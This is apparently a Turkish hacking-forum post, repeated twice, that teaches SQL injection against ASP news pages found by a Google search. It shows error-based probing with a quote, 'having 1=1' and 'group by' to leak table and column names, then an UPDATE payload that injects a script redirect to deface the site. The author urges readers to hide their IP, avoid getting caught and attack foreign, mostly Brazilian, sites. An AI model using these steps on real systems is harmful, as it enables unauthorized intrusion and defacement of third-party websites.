sa arkadaşlar ben daha önce yayınlanan shell.com.br sitesindeki açıkla ilgili hack yöntemini anlatacağım....
google'a noticia_ver.asp?id= yazıyoruz
karşımıza www.siteadı.com.br/noticia_ver.asp?id=487 gibi sonuçlar gelicek tıklıyoruz ve sonuna 'a ekleyerek hata mesajı alıyoruz
örnek : www.siteadı.com.br/noticia_ver.asp?id=487'a yazıyoruz ve
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/includes/conexao.asp, line 34
eğer bu mesajı aldıysak '' /includes/conexao.asp, line 34 '' sitede açık var demektir
o zaman hemen aynı adresin sonuna having 1=1 yazarak tabloyu buluyoruz
örnek: www.siteadı.com.br/noticia_ver.asp?id=487having 1=1 yazıp enterlıyoruz
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Noticia.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/includes/conexao.asp, line 34
gibi bi hata mesajı geldi burada önemli olan şey şudur Column 'Noticia.id' yani tablomuzun ismi aynen yazdığı gibi Noticia.id miş. tabi bu isim her sitede aynı olcak diye bişey yok.
şimdi kolonu bulmak için aynı adresin sonuna group by 'tablo ismi' yazıp enterlıyoruz
örnek: www.siteadı.com.br/noticia_ver.asp?id=487 group by Noticia.id
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Noticia.titulo' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/conexao.asp, line 34
yine burda önemli olan kısım bu : Column 'Noticia.titulo' yani kolon titulo muş
şimdi gelelim index atmaya...
update+tablo ismi+set+kolon='******************=''http://indexin adresi.com/''</script>'
şeklinde aynı adresin sonuna aşağıdaki örnekteki gibi ekliyoruz ve enter diyoruz...
örnek: www.siteadı.com.br/noticia_ver.asp?id=487%20update+Noticia+set+titulo='******************=''http://indexinizin adresi.com/''</script>'
yıldızlı lı yerlerde <skript>lokation yazıyor siz ' k ' ları ' c ' olarak yazıcaksınız ben yazdımmı olmuyo,yıldız oluyo
işte olduu... sayfayı yenilediğinizde kendi indexinizi göreceksiniz...
size bi tavsiye dikkat edin yakalanmayın yada ip gizleyici bi program kullanın çünkü ben bunu yaptım ve web sitesi benim ip mi aldı internet browserımın versiyonuna varana kadar kayıt altına aldı ama çıkan siteler genellikle com.br şeklinde yani yurtdışı o yüzden korkmayın... saldırın
(+rep emeğe saygı lütfen)
google'a noticia_ver.asp?id= yazıyoruz
karşımıza www.siteadı.com.br/noticia_ver.asp?id=487 gibi sonuçlar gelicek tıklıyoruz ve sonuna 'a ekleyerek hata mesajı alıyoruz
örnek : www.siteadı.com.br/noticia_ver.asp?id=487'a yazıyoruz ve
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a'.
/includes/conexao.asp, line 34
eğer bu mesajı aldıysak '' /includes/conexao.asp, line 34 '' sitede açık var demektir
o zaman hemen aynı adresin sonuna having 1=1 yazarak tabloyu buluyoruz
örnek: www.siteadı.com.br/noticia_ver.asp?id=487having 1=1 yazıp enterlıyoruz
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Noticia.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/includes/conexao.asp, line 34
gibi bi hata mesajı geldi burada önemli olan şey şudur Column 'Noticia.id' yani tablomuzun ismi aynen yazdığı gibi Noticia.id miş. tabi bu isim her sitede aynı olcak diye bişey yok.
şimdi kolonu bulmak için aynı adresin sonuna group by 'tablo ismi' yazıp enterlıyoruz
örnek: www.siteadı.com.br/noticia_ver.asp?id=487 group by Noticia.id
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Noticia.titulo' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/conexao.asp, line 34
yine burda önemli olan kısım bu : Column 'Noticia.titulo' yani kolon titulo muş
şimdi gelelim index atmaya...
update+tablo ismi+set+kolon='******************=''http://indexin adresi.com/''</script>'
şeklinde aynı adresin sonuna aşağıdaki örnekteki gibi ekliyoruz ve enter diyoruz...
örnek: www.siteadı.com.br/noticia_ver.asp?id=487%20update+Noticia+set+titulo='******************=''http://indexinizin adresi.com/''</script>'
yıldızlı lı yerlerde <skript>lokation yazıyor siz ' k ' ları ' c ' olarak yazıcaksınız ben yazdımmı olmuyo,yıldız oluyo
işte olduu... sayfayı yenilediğinizde kendi indexinizi göreceksiniz...
size bi tavsiye dikkat edin yakalanmayın yada ip gizleyici bi program kullanın çünkü ben bunu yaptım ve web sitesi benim ip mi aldı internet browserımın versiyonuna varana kadar kayıt altına aldı
ama çıkan siteler genellikle com.br şeklinde yani yurtdışı o yüzden korkmayın... saldırın (+rep emeğe saygı lütfen)
Son düzenleme:
